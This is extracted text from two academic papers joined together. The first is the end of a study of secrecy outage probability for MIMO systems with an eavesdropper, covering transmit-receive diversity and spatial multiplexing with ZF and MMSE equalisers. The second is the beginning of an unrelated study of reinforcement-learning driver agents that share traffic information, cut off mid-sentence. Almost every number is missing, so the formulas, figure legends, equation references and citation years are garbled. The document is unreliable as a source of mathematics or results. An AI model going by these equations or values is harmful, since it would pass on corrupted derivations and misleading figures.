p∞out,tr(r)=(atrγ̄r) −dtr+o ( γ̄ −dtr r ) ( ) where the secrecy diversity gain is dtr=mtmr ( ) and the secrecy array gain is atr = [ (me− )! [ l∏ p= (l−p)! (mt+mr−p)! ]mtmr∑ n= ( mtmr n ) ×(n+me− )! nr( r− )mtmr−nγ̄ne ]− mtmr . ( ) it is clear from eq. ( ) that the secrecy diversity order is dependent on mt and mr, and independent of me. it can also be seen from eq. ( ) that the eavesdropper channel has an adverse impact on the secrecy array gain. accordingly, increasing the number of antennas at the eavesdropper lessens the secrecy array gain, thereby rising the secrecy outage probability. spatial multiplexing system applying (gradshteyn & ryzhik, , equation ( . . )) to the exponential function in eq. ( ) and performing some algebraic manipulations, the first-order expansion of the maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cdf of γr,zf,i can be derived as fγr,zf(x)= xmr−mt+ (mr−mt+ )!γ̄ mr−mt+ r +o (( x γ̄r )mr−mt+ ) . ( ) using eqs. ( ), ( ) and ( ), and following the same procedure as used in eq. ( ), an asymptotic expression for pout,zf(r) with γ̄r→∞ is obtained as p∞out,zf(r)=(azfγ̄r) −dzf+o ( γ̄ −dzf r ) ( ) where dzf=mr−mt+ ( ) and azf= [∑mr−mt+ n= (mr−mt+ n ) nr( r− )mr−mt+ −n(n+me−mt)!γ̄ne (mr−mt+ )!(me−mt)! ]− mr−mt+ . ( ) adopting the same steps as for deriving the first-order expansion of fγr,zf(x), we obtain fγr,mmse(x)= xmr (mr−mt+ )!γ̄ mr−mt+ r (x+ )mt− +o (( x γ̄r )mr−mt+ ) . ( ) using eqs. ( ), ( ) and ( ), and following the same procedure as used in eq. ( ), an asymptotic expression for pout,mmse(r) with γ̄r→∞ is obtained as p∞out,mmse(r)=(ammseγ̄r) −dmmse+o ( γ̄ −dmmse r ) ( ) where dmmse=mr−mt+ ( ) and ammse = [ e γ̄e (mr−mt+ )r (mr−mt+ )! me− ∑ m= gm mr∑ n= ( mr n ) (− )nγ̄m−n+mr− mt+ e nr × [ γ̄e m+ ∑ k = ( m+ k )( − γ̄e )k ( m−n−k +mr− mt+ , γ̄e ) +γ̄e ( mt+ γ̄e −m− ) m∑ k = ( m k )( − γ̄e )k ( m−n−k +mr− mt+ , γ̄e ) −m m− ∑ k = ( m− k )( − γ̄e )k ( m−n−k +mr− mt+ , γ̄e )]]− mr−mt+ . ( ) it is obvious from eqs. ( ) and ( ) that the secrecy diversity orders of the spatial multiplexing systems with zf equalization and mmse equalization are dependent on mt and mr, and independent of me. it can also be observed from eqs. ( ) and ( ) that increasing me decreases the corresponding secrecy array gains. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. average snr at the receiver (db) - - - - - - - - s e cr e cy o u ta g e p ro b a b ili ty m t = , m r = , m e = m t = , m r = , m e = (simu.) m t = , m r = , m e = m t = , m r = , m e = (simu.) m t = , m r = , m e = m t = , m r = , m e = (simu.) m t = , m r = , m e = m t = , m r = , m e = (simu.) figure secrecy outage probability of transmit-receive diversity system (pout,tr) as a function of γ̄r. this figure shows the theoretical and simulated secrecy outage curves for the transmit-receive diversity system with different numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdropper (me). the simulation results are labeled with ‘‘simu.’’. full-size doi: . /peerjcs. /fig- numerical results in this section, we validate the preceding theoretical analysis and investigate the effect of the various system parameters. for these purposes, theoretical and simulation results are obtained by using matlab. specifically, we use the closed-form expressions derived above to generate the theoretical results, and adopt the monte carlo method to generate the simulation results. remember that γ̄r and γ̄e are the average snrs at the legitimate receiver and the passive eavesdropper, respectively. unless otherwise indicated, the snr γ̄e is set to db, and the target secrecy rate r is set to bit/s/hz. figure shows the theoretical secrecy outage probability of the transmit-receive diversity system (computed with eq. ( )) and its simulation counterpart (labeled with ‘‘simu.’’) against γ̄r. as seen in the figure, the theoretical and simulation results match perfectly. for a given γ̄r, when mt+mr = and me = , the secrecy outage probability with mt = and mr = is lower than that with mt = and mr = . this is consistent with the fact that for a fixed total number of antennas at the transmitter and legitimate receiver (mt+mr), a more-balanced antenna configuration provides a larger diversity gain (dighe, mallik & jamuar, ; maaref & aïssa, ). specifically, from eq. ( ), we have dtr= for mt= and mr= , and dtr = for mt = and mr = . however, when mtmr = and me = , the secrecy outage probability with mt = and mr = is higher than that with mt = and mr = . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − − − − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = figure pout,tr for different combinations of mt, mr, and me. this figure shows the theoretical secrecy outage curves for the transmit-receive diversity system, comparing different numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdropper (me). full-size doi: . /peerjcs. /fig- the reason is that for the same product of mt and mr, an increase in mt+mr yields a performance enhancement (dighe, mallik & jamuar, ). figure depicts the theoretical secrecy outage probability of the aforementioned system for different combinations of mt, mr, and me. we observe that when (mt,mr) is kept fixed (i.e., at ( , ), ( , ), or ( , )), the larger me is, the smaller the array gain (as discussed in eq. ( )), which worsens the secrecy outage performance. furthermore, it can be seen that for a given γ̄r, the secrecy outage probability with (mt,mr,me)=( , , ) is higher than that with (mt,mr,me)=( , , ). meanwhile, the secrecy outage probability with (mt,mr,me)= ( , , ) is higher than that with (mt,mr,me)= ( , , ). the same performance trend occurs when (mt,mr,me) increases from ( , , ) to ( , , ) or from ( , , ) to ( , , ). these results reveal that adding mt and mr proportionally to me is advantageous. figure verifies the asymptotic secrecy outage probability of the transmit-receive diversity system derived in eqs. ( )–( ) at a fixed γ̄e (i.e., γ̄e = db). the exact and asymptotic secrecy outage curves are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. as γ̄r grows, the asymptotic curves approach the exact ones for different values of mt, mr, and me. it can also be observed that the secrecy diversity gain is mtmr, as predicted by eq. ( ), and the secrecy array gain diminishes with increasing me, as predicted by eq. ( ). figure compares the theoretical secrecy outage results for the spatial multiplexing systems with zf equalization (computed with eq. ( )) and mmse equalization (computed with eq. ( )), and their simulation counterparts. the theoretical and simulation results maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − − − − s ec re cy ou ta ge pr ob ab ili ty average snr at the receiver (db) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) figure comparison of exact and asymptotic secrecy outage probability of transmit-receive diversity system. this figure shows the exact and asymptotic secrecy outage curves for the transmit-receive diversity system with different numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdropper (me). the exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. full-size doi: . /peerjcs. /fig- − − − − − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty zf, m t = , m r = , m e = zf, m t = , m r = , m e = (simu.) mmse, m t = , m r = , m e = mmse, m t = , m r = , m e = (simu.) zf, m t = , m r = , m e = zf, m t = , m r = , m e = (simu.) mmse, m t = , m r = , m e = mmse, m t = , m r = , m e = (simu.) zf, m t = , m r = , m e = zf, m t = , m r = , m e = (simu.) mmse, m t = , m r = , m e = mmse, m t = , m r = , m e = (simu.) figure secrecy outage probability of spatial multiplexing systems with zf equalization (pout,zf) and mmse equalization (pout,mmse). this figure shows the theoretical and simulated secrecy outage curves for the zf equalization-based and mmse equalization-based spatial multiplexing systems with different num- bers of antennas at the legitimate receiver (mr) and fixed numbers of antennas at the transmitter (mt) and the eavesdropper (me). the simulation results are labeled with ‘‘simu.’’. full-size doi: . /peerjcs. /fig- maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. for a detailed analysis of the number of flops required for matrix–vector operations such as associated summations and multiplications, readers are referred to hunger ( ). − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db zf, m t = , m r = , m e = , γ e = db mmse, m t = , m r = , m e = , γ e = db figure pout,zf versus pout,mmse for various me at fixed mt and mr (mt = mr = ). this figure shows the theoretical secrecy outage curves for the zf equalization-based and mmse equalization-based spatial mul- tiplexing systems with different numbers of antennas and average snrs at the eavesdropper (me and γ̄e), and fixed numbers of antennas at the transmitter (mt) and the legitimate receiver (mr). full-size doi: . /peerjcs. /fig- agree well, and both kinds of systems exhibit similar secrecy outage performance. indeed, the spatial multiplexing system with mmse equalization achieves lower secrecy outage probability when the number of antennas at the eavesdropper is more than that at the receiver, as illustrated in fig. . in addition, most noteworthy in eq. ( ) is the fact that, when the values of (mr−mt) and (me−mt) are fixed, the secrecy outage probability of the spatial multiplexing system with zf equalization remains the same regardless of the value of mt that is used. this fact is confirmed by fig. , where we plot the simulated secrecy outage curves in the case of mr−mt= ,me−mt= and that of mr−mt= ,me−mt= . figures and verify the asymptotic secrecy outage probability of the spatial multiplexing system with zf equalization derived in eqs. ( )–( ) and that of the spatial multiplexing system with mmse equalization derived in eqs. ( )–( ), respectively, at a fixed γ̄e (i.e., γ̄e = db). as γ̄r increases, the asymptotic curves tend towards the exact ones for different values of mt, mr, and me. it can also be noticed that the secrecy diversity gains of the two systems are mr−mt+ , as predicted by eqs. ( ) and ( ), and the corresponding secrecy array gains lessen with growing me, as predicted by eqs. ( ) and ( ). finally, it is interesting to compare the computational complexity of all three systems. to this end, we express such complexity in terms of the number of floating-point operations (flops), and the relevant calculations are summarized as follows: ( ) the number of flops maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = figure examples of pout,zf with mt = mr = me and that with mr = mt + and me = mt + . this figure shows the simulated secrecy outage curves for the zf equalization-based spatial multiplexing system in the case that the numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdrop- per (me) are the same, and the case of mr =mt+ , me =mt+ . full-size doi: . /peerjcs. /fig- − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) figure comparison of exact and asymptotic secrecy outage probability of spatial multiplexing sys- tem with zf equalization. this figure shows the exact and asymptotic secrecy outage curves for the zf equalization-based spatial multiplexing system with different numbers of antennas at the legitimate re- ceiver (mr) and the eavesdropper (me), and a fixed number of antennas at the transmitter (mt). the exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. full-size doi: . /peerjcs. /fig- maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. in practice, the choice of n depends on the ratio between the magnitude of the second largest eigenvalue of hrh † r and that of the corresponding largest eigenvalue as it dictates the rate of convergence (see golub & van loan ( ), section . ) for more details). − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) m t = , m r = , m e = (exact) m t = , m r = , m e = (asym.) figure comparison of exact and asymptotic secrecy outage probability of spatial multiplexing sys- tem with mmse equalization. this figure shows the exact and asymptotic secrecy outage curves for the mmse equalization-based spatial multiplexing system with different numbers of antennas at the legiti- mate receiver (mr) and the eavesdropper (me), and a fixed number of antennas at the transmitter (mt). the exact and asymptotic results are labeled with ‘‘exact’’ and ‘‘asym.’’, respectively. full-size doi: . /peerjcs. /fig- required to compute zr (via power iteration (golub & van loan, , section . )), wt, and ze for the transmit-receive diversity system; ( ) the number of flops required to compute wr,zf and we,zf for the spatial multiplexing system with zf equalization; and ( ) the number of flops required to compute wr,mmse and we,mmse for the spatial multiplexing system with mmse equalization. the results are given in table , where n is the number of iterations used in the power iteration method. figure shows the system complexity as a function of mt for mt =mr =me and for mr =me = mt. from this figure, we see that the computational complexity of the spatial multiplexing system with zf equalization is comparable to that of the spatial multiplexing system with mmse equalization, while the transmit-receive diversity system has the highest computational complexity, even with n = . conclusion we have presented exact and asymptotic analysis of the secrecy outage probability of the transmit-receive diversity system and spatial multiplexing systems with zf equalization and mmse equalization in a rayleigh-fading mimo wiretap channel. this asymptotic analysis has shown that the transmit-receive diversity system achieves a secrecy diversity order of mtmr, whereas the two spatial multiplexing systems offer the same secrecy diversity order of mr−mt+ . interestingly, all of these secrecy diversity orders do not rely on me. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table system complexity in terms of floating-point operations. this table shows the computational complexity of the transmit-receive diversity system and the spatial multiplexing systems with zf equaliza- tion and mmse equalization. system number of flops transmit-receive diversity mtm r + mtmr+ mtme+ mt +( n − )m r + nmr+ me spatial multiplexing with zf m t + mtmr+ mtme−mr−me+ spatial multiplexing with mmse m t + mtmr+ mtme−mr−me+ number of transmit antennas n u m b e r o f flo p s tr, m t =m r =m e , n= tr, m t =m r =m e , n= zf, m t =m r =m e mmse, m t =m r =m e tr, m r =m e = m t , n= tr, m r =m e = m t , n= zf, m r =m e = m t mmse, m r =m e = m t figure comparison of system complexity for mt = mr = me and for mr = me = mt. this figure shows the system complexity for the case that the numbers of antennas at the transmitter (mt), the legiti- mate receiver (mr), and the eavesdropper (me) are the same, and the case of mr =me = mt. full-size doi: . /peerjcs. /fig- numerical results based on both theoretical analysis and simulations have demonstrated how mt, mr, and me affect the secrecy performance of such mimo systems. additional information and declarations funding the author received no funding for this work. competing interests the author declares there are no competing interests. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. author contributions • kiattisak maichalernnukul conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/secrecy /peerj. references bashar s, ding z, li gy. . on secrecy of codebook-based transmission beamforming under receiver limited feedback. ieee transactions on wireless communications ( ): – doi . /twc. . . . biglieri e, calderbank r, constantinides a, goldsmith a, paulraj aj, poor hv. . mimo wireless communications. new york: cambridge university press. bloch m, barros j, rodrigues mrd, mclaughlin sw. . wireless information- theoretic security. ieee transactions on information theory ( ): – doi . /tit. . . chen c-j, wang l-c. . performance analysis of scheduling in multiuser mimo sys- tems with zero-forcing receivers. ieee journal on selected areas in communications ( ): – doi . /jsac. . . csiszár i, körner j. . broadcast channels with confidential messages. ieee transac- tions on information theory ( ): – doi . /tit. . . dighe pa, mallik rk, jamuar ss. . analysis of transmit-receive diversity in rayleigh fading. ieee transactions on communications ( ): – doi . /tcomm. . . dong l, han z, petropulu ap, poor hv. . improving wireless physical layer security via cooperating relays. ieee transactions on signal processing ( ): – doi . /tsp. . . ferdinand ns, da costa db, latva-aho m. . physical layer security in mimo ostbc line-of-sight wiretap channels with arbitrary transmit/receive antenna correlation. ieee wireless communications letters ( ): – doi . /wcl. . . . foschini gj. . layered space-time architecture for wireless communication in a fading environment when using multi-element antennas. bell labs technical journal ( ): – doi . /bltj. . gallager rg. . principles of digital communication. new york: cambridge university press. goel s, negi r. . guaranteeing secrecy using artificial noise. ieee transactions on wireless communications ( ): – doi . /twc. . . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/secrecy /peerj http://dx.doi.org/ . /twc. . . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tcomm. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /wcl. . . http://dx.doi.org/ . /bltj. http://dx.doi.org/ . /twc. . http://dx.doi.org/ . /peerj-cs. golub gh, van loan cf. . matrix computations. baltimore: johns hopkins university press. gradshteyn is, ryzhik im. . table of integrals, series and products. new york: academic press. he f, man h, wang w. . maximal ratio diversity combining enhanced security. ieee communications letters ( ): – doi . /lcomm. . . . heath jr rw, lozano a. . foundation of mimo communication. new york: cambridge university press. hunger r. . floating point operations in matrix-vector calculus. technical report. department of electrical and computer engineering, munich: technical university of munich. jankiraman m. . space-time codes and mimo systems. boston: artech house. jiang y, li j, hager ww. . uniform channel decomposition for mimo communications. ieee transactions on signal processing ( ): – doi . /tsp. . . jiang y, varanasi mk, li j. . performance analysis of zf and mmse equalizers for mimo systems: an in-depth study of the high snr regime. ieee transactions on information theory ( ): – doi . /tit. . . kalman d. . the maximum and minimum of two numbers using the quadratic formula. college mathematics journal ( ): – doi . / . khisti a, wornell gw. . secure transmission with multiple antennas–part ii: the mimome wiretap channel. ieee transactions on information theory ( ): – doi . /tit. . . kumar kr, caire g, moustakas al. . asymptotic performance of linear receivers in mimo fading channels. ieee transactions on information theory ( ): – doi . /tit. . . leung-yan-cheong sk, hellman me. . the gaussian wire-tap channel. ieee transactions on information theory ( ): – doi . /tit. . . lin c-h, tsai s-h, lin y-p. . secure transmission using mimo precod- ing. ieee transactions on information forensics and security ( ): – doi . /tifs. . . maaref a, aïssa s. . closed-form expressions for the outage and ergodic shan- non capacity of mimo mrc systems. ieee transactions on communications ( ): – doi . /tcomm. . . maichalernnukul k. . secrecy capacity analysis of transmit-receive diversity systems. in: proceedings of the ieee statistical signal processing workshop. ieee: freiburg, piscataway, – doi . /ssp. . . mckay mr. . random matrix theory analysis of multiple antenna communication systems. phd dissertation, the university of sydney, australia. mukherjee a, swindlehurst al. . robust beamforming for security in mimo wiretap channels with imperfect csi. ieee transactions on signal processing ( ): – doi . /tsp. . . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /lcomm. . . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . / http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tifs. . http://dx.doi.org/ . /tcomm. . http://dx.doi.org/ . /ssp. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /peerj-cs. oggier f, hassibi b. . the secrecy capacity of the mimo wiretap channel. ieee transactions on information theory ( ): – doi . /tit. . . ordóñez lg, palomar dp, pagès-zamora a, fonollosa jr. . high-snr analytical performance of spatial multiplexing mimo systems with csi. ieee transactions on signal processing ( ): – doi . /tsp. . . palomar dp, lagunas ma. . joint transmit-receive space-time equalization in spatially correlated mimo channels: a beamforming approach. ieee journal on selected areas in communications ( ): – doi . /jsac. . . papoulis a, pillai su. . probability, random variables, and stochastic processes. new york: mcgraw-hill. poor hv, schaefer rf. . wireless physical layer security. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . schaefer rf, loyka s. . the secrecy capacity of compound gaussian mimo wiretap channels. ieee transactions on information theory ( ): – doi . /tit. . . seethaler d, artés h, hlawatsch f. . dynamic nulling-and-cancelling with near-ml performance. in: proceedings of the ieee international conference on acoustics, speech and signal processing. montreal, – . seethaler d, artés h, hlawatsch f. . detection techniques for mimo spatial multiplexing systems. elektrotechnik und informationstechnik ( ): – doi . /bf . smith pj. . exact performance analysis of optimum combining with multiple inter- ferers in flat rayleigh fading. ieee transactions on communications ( ): – . tse d, viswanath p. . fundamentals of wireless communications. cambridge: cambridge university press. wang h-m, wang c, ng dwk. . artificial noise assisted secure transmission under training and feedback. ieee transactions on signal processing ( ): – doi . /tsp. . . wang h-m, wang c, ng dwk, lee mh, xiao j. a. artificial noise assisted secure transmission for distributed antenna systems. ieee transactions on signal processing ( ): – doi . /tsp. . . wang h-m, zheng t-x, yuan j, towsley d, lee mh. b. physical layer secu- rity in heterogeneous cellular networks. ieee transactions on communications ( ): – doi . /tcomm. . . wyner ad. . the wire-tap channel. the bell system technical journal ( ): – doi . /j. - . .tb .x. yang n, yeoh pl, elkashlan m, schober r, collings ib. . transmit antenna selection for security enhancement in mimo wiretap channels. ieee transactions on communications ( ): – doi . /tcomm. . . . zou y, wang x, shen w. . physical-layer security with multiuser scheduling in cognitive radio networks. ieee transactions on communications ( ): – doi . /tcomm. . . . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /jsac. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tsp. . http://dx.doi.org/ . /tcomm. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /tcomm. . . http://dx.doi.org/ . /tcomm. . . http://dx.doi.org/ . /peerj-cs. sharing diverse information gets driver agents to learn faster: an application in en route trip building sharing diverse information gets driver agents to learn faster: an application in en route trip building guilherme dytz dos santos and ana l.c. bazzan computer science, ufrgs (universidade federal do rio grande do sul), porto alegre, rs, brazil abstract with the increase in the use of private transportation, developing more efficient ways to distribute routes in a traffic network has become more and more important. several attempts to address this issue have already been proposed, either by using a central authority to assign routes to the vehicles, or by means of a learning process where drivers select their best routes based on their previous experiences. the present work addresses a way to connect reinforcement learning to new technologies such as car-to-infrastructure communication in order to augment the drivers knowledge in an attempt to accelerate the learning process. our method was compared to both a classical, iterative approach, as well as to standard reinforcement learning without communication. results show that our method outperforms both of them. further, we have performed robustness tests, by allowing messages to be lost, and by reducing the storage capacity of the communication devices. we were able to show that our method is not only tolerant to information loss, but also points out to improved performance when not all agents get the same information. hence, we stress the fact that, before deploying communication in urban scenarios, it is necessary to take into consideration that the quality and diversity of information shared are key aspects. subjects agents and multi-agent systems keywords multiagent systems, reinforcement learning, route choice introduction with the covid- related pandemic, there has been several reports that the use of private transportation means (e.g., individual vehicles) is increasing as people try to avoid public transit as much as possible. this leads to even more congestion and hence makes the question of selecting a route to go from a to b more and more prominent. this is especially the case for commuters, who make a given trip nearly every day and, hence, have the opportunity to learn and/or adapt to the traffic patterns faced daily. to address the challenges posed by an ever increasing demand, transportation authorities and traffic experts try to distribute the flow among existing routes in order to minimize the overall travel time. often, this task involves some form of communication with the drivers. traditional approaches such as variable message panels or radio broadcast are now being replaced by directed (and potentially personalized) communication, via new kinds of communication devices. how to cite this article dos santos gd, bazzan alc. . sharing diverse information gets driver agents to learn faster: an application in en route trip building. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author ana l.c. bazzan, bazzan@inf.ufrgs.br academic editor josé manuel galán additional information and declarations can be found on page doi . /peerj-cs. copyright dos santos and bazzan distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:bazzan@�inf.�ufrgs.�br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ while the current pattern is that each individual driver selects a route based on his/her own experience, this is changing as new technologies allow all sorts of information exchange. examples of these technologies are not only based on broadcast (e.g., gps or cellphone information) but also a two-way communication channel, where drivers not only receive traffic information but also provide them. hence, currently, many traffic-related applications for cellphones deal with the idea of a central authority in charge of somehow assigning routes for drivers. examples are waze, google apps, etc. since their specific algorithms are not published, one can only guess that they try to find a feasible solution, given a set of constraints that they are able to infer from the current data they collect. what seems certain is that these platforms work in a centralized way, based on data they collect when their customers or users use their specific apps. also, they do not handle locally collected and processed data. this leads to them being ineffective when the penetration of their services is low as, for example, during the initial stages of the pandemics, when few drivers were using the system. a way to mitigate this could be to decentralize the processing of information, as proposed here, and passing it to drivers to make their route choices. our method has some resemblance with the notion of traffic assignment (see “background and related work”), since it is based on the fact that drivers collect experience by trying out several routes until they settle on those that lead to the least travel time. traffic assignment approaches work (and indeed were developed for this purpose) well for planning tasks, that is, how to plan a traffic network (or change an existing one) in order to minimize travel costs. however, route choice is not related to planning tasks but, rather, is an operational aspect, especially in commuting situations, where drivers repeatedly travel from the same origin to the same destination. besides, traffic assignment is a centralized approach, in which the drivers do not actively select routes. rather, routes are assigned to them. thus, it is important to investigate how drivers do select routes in their daily commuting tasks. multi-agent reinforcement learning (marl) can be used for such purpose, as it fits the task of letting agents decide, autonomously, how to select routes to go from a to b. this is realized by letting agents iteratively choose their least costly route based on their own learning experiences. such approach has been tried before, as described in the section on related works. in fact, it has been shown that reinforcement learning is a good technique to investigate route choice. however, the learning process can be inefficient, as for instance, it may take time, since the agents have to collect experiences by themselves. as this happens to be a very noisy environment, the signal an agent gets can be little discriminatory (e.g., due to the presence of other learning agents, an agent may get the same signal for very different actions, or, conversely, different signals for the same action). thus, our long term aim is to investigate forms of accelerating the learning process. one of these forms is by giving more information to the agents. there are only few works that consider new technologies to this experience, as for instance those tied to vehicular communication in general. in the present article, we extend a method that connects marl to new technologies such as car-to-infrastructure communication (c i). these were formulated with the goal dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of investigating how c i communication could act to augment the information drivers use in their learning processes associated with choices of routes. in such approach, whole routes are not imposed or recommended to drivers, but rather, these receive local information about the most updated state of the links that happen to be near their current location. this way, drivers can change their route on-the-fly (the so-called en route trip building). further, that approach assumes that the infrastructure is able to communicate with the vehicles, both collecting information about their most recent travel times (on given links), as well as providing them with information that was collected from other vehicles. however, another assumption is that messages are never lost, which is not realistic. thus, in the present article, we relax this assumption and admit loses of messages, as well as investigate the impact of them on the overall performance. as a result of such extension, we are able to confirm that the marl technique combined with a c i model can accelerate the learning process. moreover, our approach is tolerant to information loses. in short, the contribution of the present work is manifold. first, we employ marl to the task of learning how to go from a to b. second, we do this using a non trivial scenario (as it is the case in most of the literature), in which there are more than one origin-destination pair. third, we depart from most of the literature where the learning task considers that the driver agents already know a set of (pre-computed) routes to select among. rather, we let these agents build their trips en route. this in turn requires the use of a microscopic, agent-based approach, where agents can potentially use different pieces of information in order to perform en route choice. this again contrasts to most of the literature, which uses macroscopic modeling (e.g., by means of abstract cost functions to compute travel times). fourth, we connect marl with the aforementioned communication technologies, in order to investigate whether the learning process can be accelerated by exchange of local information only. lastly, we extend a previous approach by investigating its robustness to loses of messages. this article is organized as follows. the “background and related work” briefly presents some background concepts on traffic assignment and reinforcement learning, as well as the panorama on the related work. following, our methods and experimental results are presented and discussed. we review the general conclusions and outline the future work in the last section. background and related work the traffic assignment problem in transportation, the traffic assignment problem (tap) refers to how to connect a supply (traffic infrastructure) to its demand, so that the travel time of vehicles driving within a network is reduced. this network can be seen as a graph g = (n, e), where n is the set of nodes that operate as junctions/intersections, and e is a set of directed links (or edges, as both terms are used interchangeably) that connect the nodes. hence the goal is then to assign vehicles to routes so that the travel time is minimized. for more details, the reader is referred to chapter in ortúzar & willumsen ( ). for our purposes it suffices to mention that classical approaches aim at planning tasks, are dos santos and bazzan ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ centralized (i.e., trips are assigned by a central authority, not selected by individual drivers). also, the main approaches are based on iterative methods that seeks convergence to the user equilibrium (see “user equilibrium”). user equilibrium when it comes to reaching a solution to the tap, one can take into account two perspectives: one that considers the system as a whole, and one that considers each user’s point of view. in the system perspective, the best solution refers to the system reaching the best average travel time possible; this is the so called system optimum (so), or wardrop’s second principle (wardrop, ). we stress that the so is a desirable property, but hardly achievable given that it comes at the cost of some users, who are not able to select a route leading to their personal best travel times. on the other hand, and most relevant for our current work, at the user’s perspective, the system reaches the user (or nash) equilibrium (ue) when there is no advantage for any individual to change its routes in order to minimize their travel time, as stated in the first wardrop’s principle (wardrop, ). the ue can be achieved by means of reinforcement learning, as discussed next. reinforcement learning reinforcement learning (rl) is a machine learning method whose main objective is to make agents learn a policy, that is, how to map a given state to a given action, by means of a value function. rl can be modeled as a markov decision process (mdp), where there is a set of states s, a set of actions a, a reward function r : s � a ! r, and a probabilistic state transition function t(s, a, s′) / [ , ], where s ∈ s is a state the agent is currently in, a ∈ a is the action the agent takes, and s′ ∈ s is a state the agent might end up, taking action a in state s, so the tuple (s, a, s′, r) states that an agent was in state s, then took action a, ended up in state s′ and received a reward r. the key idea of rl is to find an optimal policy p�, which maps states to actions in a way that maximizes future reward. reinforcement learning methods fall within two main categories: model-based and model-free. while in the model-based approaches the reward function and the state transition are known, in the model-free case, the agents learn r and t by interacting with an environment. one method that is frequently used in many applications is q-learning (watkins & dayan, ), which is a model-free approach. in q-learning, the agent keeps a table of q-values that estimate how good it is for it to take an action a in state s, in other words, a q-value q(s, a) holds the maximum discounted value of going from state s, taking an action a and keep going through an optimal policy. in each learning episode, the agents update their q-values using the eq. ( ), where 